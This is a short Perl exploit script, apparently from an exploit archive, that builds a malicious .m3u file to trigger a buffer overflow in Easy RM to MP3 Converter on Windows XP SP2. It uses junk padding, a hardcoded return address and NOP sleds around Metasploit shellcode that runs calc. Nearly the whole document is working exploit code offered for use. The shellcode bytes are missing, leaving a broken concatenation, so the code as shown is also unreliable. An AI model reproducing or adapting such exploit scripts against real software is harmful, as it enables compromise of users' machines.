# Easy RM to MP3 Converter (.m3u) File WinXP Sp2 Buffer Overflow Exploit
# Author: Vinod Sharma
# Download : http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
# Tested : Windows XP SP2 (En)
# Thanks to exploit-db
# Originally published at : http://securitygyan.com/2009/12/10/easyrmtomp3-m3ufile-exploit/
#Vulnerability discovered by CYBER-ZONE
my $file= "exploit.m3u";
my $junk= "\x41" x 26059;
my $eip= pack('V', 0x01a8f23a);
my $shellcode= "\x90" x 25;
#* windows/exec - 223 bytes
#* http://www.metasploit.com
#* Encoder: x86/shikata_ga_nai
#* EXITFUNC=thread, CMD=calc
$shellcode = $shellcode.
$shellcode = $shellcode."\x90" x 25;
open($FILE, ">$file");
print($FILE $junk.$eip.$shellcode);
print("exploit created successfully");